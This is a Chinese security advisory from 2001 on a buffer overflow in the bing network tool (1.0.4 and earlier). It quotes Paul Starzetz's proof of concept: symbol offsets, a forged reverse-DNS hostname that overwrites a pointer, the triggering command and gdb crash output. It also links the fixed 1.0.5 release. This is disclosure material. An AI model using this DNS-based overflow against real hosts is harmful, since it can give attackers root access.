发布日期：2001-02-01
更新日期：2001-02-01

受影响系统：

    Pierre Beyssac bing 1.0.4以及更低版本
       + S.u.S.E. Linux 6.4
       + S.u.S.E. Linux 6.3
       + S.u.S.E. Linux 6.2
       + S.u.S.E. Linux 6.1

描述：

---

bing是由Pierre Beyssac开发设计的公开源代码的软件包，通过在两点之间发送各种
大小的ICMP报文并记录往返时间，计算两点之间的网络通信能力。

bing中采用了一个80字节固定大小的静态缓冲区，用于保存gethostbyaddr()返回的
主机名。恶意用户可以通过控制DNS服务器，伪造反向解析记录，达到缓冲区溢出的
目的，从而获取root权限。

<* 来源：Paul Starzetz (paul@starzetz.de) *>



测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Paul Starzetz (paul@starzetz.de) 提供了下列测试方法：

Looking at the symbol table I found that:

paul@phoenix:~/tmp2/bing > objdump --syms /usr/bin/bing|grep "0804f4"
0804f4ac l     O .bss   00000001 nrand
0804f4a8 l     O .bss   00000004 lastrand
0804f420 l     O .bss   00000050 buf.34
0804f470 l     O .bss   00000004 old_rrlen.37
0804f480 l     O .bss   00000028 old_rr.38
0804f4b0 l     O .bss   00000004 objects
0804f4c0 g     O .bss   0000ffbc outpack

There are 6 variables which we can overwrite, though. The offset from
buf to objects hook is 144 (dec). To demonstrate this set up a bogus
reverse zone with a revptr like this:

"overflo1.overflo2.overflo3.overflo4.overflo5.overflo6.overflo7.overflo8.overflo9.
overfloa.overflob.overfloc.overflod.overfloe.overflof.overfl10.AbCdHERE.overfl12.o
verfl13.overfl14.overfl15.overfl16.overfl17.overfl18.overfl19.overfl2a.mil"

AbCd is the place where 'objects' will be overwritten. A simple check
confirms this:

root@phoenix:/var/named > /etc/rc.d/named start
Starting name server.done

root@phoenix:/var/named > host 192.168.100.5
5.100.168.192.IN-ADDR.ARPA domain name pointer
overflo1.overflo2.overflo3.overflo4.overflo5.overflo6.overflo7.overflo8.overflo9.o
verfloa.overflob.overfloc.overflod.overfloe.overflof.overfl10.AbCdHERE.overfl12.ov
erfl13.overfl14.overfl15.overfl16.overfl17.overfl18.overfl19.overfl2a.mil

root@phoenix:/var/named > bing -v -e1 -c1 192.168.100.5 192.168.100.5
BING    192.168.100.5 (192.168.100.5) and 192.168.100.5 (192.168.100.5)
        44 and 108 data bytes
52 bytes from
overflo1.overflo2.overflo3.overflo4.overflo5.overflo6.overflo7.overflo8.overflo9.o
verfloa.overflob.overfloc.overflod.overfloe.overflof.overfl10.AbCdHERE.overfl12.ov
erfl13.overfl14.overfl15.overfl16.overfl17.overfl18.overfl19.overfl2a.mil
(192.168.100.5): Echo Request

116 bytes from
overflo1.overflo2.overflo3.overflo4.overflo5.overflo6.overflo7.overflo8.overflo9.o
verfloa.overflob.overfloc.overflod.overfloe.overflof.overfl10.AbCdHERE.overfl12.ov
erfl13.overfl14.overfl15.overfl16.overfl17.overfl18.overfl19.overfl2a.mil
(192.168.100.5): Echo Request


--- 192.168.100.5 statistics ---
bytes   out    in   dup  loss   rtt (ms): min       avg       max
   44     1     1          0%           9.621     9.621     9.621
  108     1     1          0%           7.477     7.477     7.477

--- 192.168.100.5 statistics ---
bytes   out    in   dup  loss   rtt (ms): min       avg       max
   44     1     0        100%
  108     1     0        100%

not enough received packets to estimate link characteristics.
resetting after 1 samples.
Segmentation fault

This hapens after bing has finished its work and the libc stuff is
beeing executed:

root@phoenix:/var/named > gdb /usr/local/bing
GNU gdb 4.17.0.11 with Linux support

(gdb) set args -v -e1 -c1 192.168.100.5 192.168.100.5
(gdb) run
Starting program: /usr/bin/bing -v -e1 -c1 192.168.100.5 192.168.100.5
..
..
Program received signal SIGSEGV, Segmentation fault.
0x804cc36 in __deregister_frame_info (begin=0x804f1e0) at ./frame.c:581

(gdb) bt
#0  0x804cc36 in __deregister_frame_info (begin=0x804f1e0) at
../frame.c:581
#1  0x8048d01 in __do_global_dtors_aux ()
#2  0x804cf55 in _fini ()
#3  0x400320f5 in exit (status=0) at exit.c:55


建议：

---

厂商补丁：

    Pierre Beyssac已经提供了一个新的bing 1.0.5以解决这个问题:
    http://www.freenix.org/reseau/bing-1.0.5.tar.gz


浏览次数：7200
严重程度：0（网友投票）